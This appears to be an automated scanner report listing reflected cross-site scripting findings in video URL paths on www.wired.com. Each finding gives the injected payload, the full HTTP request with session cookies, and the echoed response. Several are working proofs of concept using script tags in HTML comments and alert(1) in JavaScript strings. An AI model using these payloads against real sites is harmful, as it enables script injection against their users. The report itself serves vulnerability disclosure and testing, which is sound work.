This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video9d3d5"><a>c3b051b443f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29323 Vary: Accept-Encoding Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 01:13:27 GMT Date: Mon, 22 Nov 2010 01:08:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video9d3d5"><a>c3b051b443f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f3df"><a>3f6a5eb5ba0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video6f3df"><a>3f6a5eb5ba0/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29324 Vary: Accept-Encoding Cache-Control: max-age=275 Expires: Sun, 21 Nov 2010 20:02:51 GMT Date: Sun, 21 Nov 2010 19:58:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video6f3df"><a>3f6a5eb5ba0"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ed94e--><script>alert(1)</script>ca386b88b06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoed94e--><script>alert(1)</script>ca386b88b06/alt-text HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:52:44 GMT Date: Mon, 22 Nov 2010 00:48:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoed94e--><script>alert(1)</script>ca386b88b06/alt-text --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30ff3"><a>102785f865 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video30ff3"><a>102785f865/alt-text HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:51:59 GMT Date: Mon, 22 Nov 2010 00:47:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video30ff3"><a>102785f865 ss_alt-text"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef29"><a>6775e296f7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/alt-text9ef29"><a>6775e296f7d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=270 Expires: Mon, 22 Nov 2010 00:52:34 GMT Date: Mon, 22 Nov 2010 00:48:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_alt-text9ef29"><a>6775e296f7d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4866"-alert(1)-"6c561f6f03b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/alt-textc4866"-alert(1)-"6c561f6f03b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:07 GMT Date: Mon, 22 Nov 2010 00:49:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 2fae8--><script>alert(1)</script>093987d625e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video2fae8--><script>alert(1)</script>093987d625e/avatar-extended-collectors-edition/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29457 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:46 GMT Date: Mon, 22 Nov 2010 00:54:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video2fae8--><script>alert(1)</script>093987d625e/avatar-extended-collectors-edition/628119810001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40544"><a>75e6bfb0ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video40544"><a>75e6bfb0ef/avatar-extended-collectors-edition/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29422 Vary: Accept-Encoding Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:58:55 GMT Date: Mon, 22 Nov 2010 00:54:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video40544"><a>75e6bfb0ef ss_avatar-extended-collectors-edition c_628119810001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d30cf"><a>691b350cceb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/avatar-extended-collectors-editiond30cf"><a>691b350cceb/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:59 GMT Date: Mon, 22 Nov 2010 00:54:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106693
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_avatar-extended-collectors-editiond30cf"><a>691b350cceb c_628119810001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 305ca"-alert(1)-"f052dbfe7ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/avatar-extended-collectors-edition305ca"-alert(1)-"f052dbfe7ac/628119810001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 01:00:43 GMT Date: Mon, 22 Nov 2010 00:55:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb6b6"-alert(1)-"4e116abbec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/avatar-extended-collectors-edition/628119810001fb6b6"-alert(1)-"4e116abbec8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:01:50 GMT Date: Mon, 22 Nov 2010 00:56:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4644"><a>05c932d0f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/avatar-extended-collectors-edition/628119810001d4644"><a>05c932d0f68 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 01:00:38 GMT Date: Mon, 22 Nov 2010 00:55:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_avatar-extended-collectors-edition c_628119810001d4644"><a>05c932d0f68"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d32"><a>32ba8c93064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video64d32"><a>32ba8c93064/behind-the-scenes-2012/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29398 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:27 GMT Date: Mon, 22 Nov 2010 00:50:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video64d32"><a>32ba8c93064 ss_behind-the-scenes-2012 c_69568495001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 33770--><script>alert(1)</script>9aa5c2d1631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video33770--><script>alert(1)</script>9aa5c2d1631/behind-the-scenes-2012/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29432 Vary: Accept-Encoding Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:55:38 GMT Date: Mon, 22 Nov 2010 00:51:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video33770--><script>alert(1)</script>9aa5c2d1631/behind-the-scenes-2012/69568495001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d6dd"><a>fd0757c5f70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-20124d6dd"><a>fd0757c5f70/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:56:10 GMT Date: Mon, 22 Nov 2010 00:51:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-20124d6dd"><a>fd0757c5f70 c_69568495001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50784"-alert(1)-"fe00a872adb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-201250784"-alert(1)-"fe00a872adb/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=270 Expires: Mon, 22 Nov 2010 00:56:42 GMT Date: Mon, 22 Nov 2010 00:52:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be55a"-alert(1)-"9e0b3694c11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-2012/69568495001be55a"-alert(1)-"9e0b3694c11 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:44 GMT Date: Mon, 22 Nov 2010 00:53:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce64a"><a>8daa3aab393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-2012/69568495001ce64a"><a>8daa3aab393 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:57:24 GMT Date: Mon, 22 Nov 2010 00:52:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
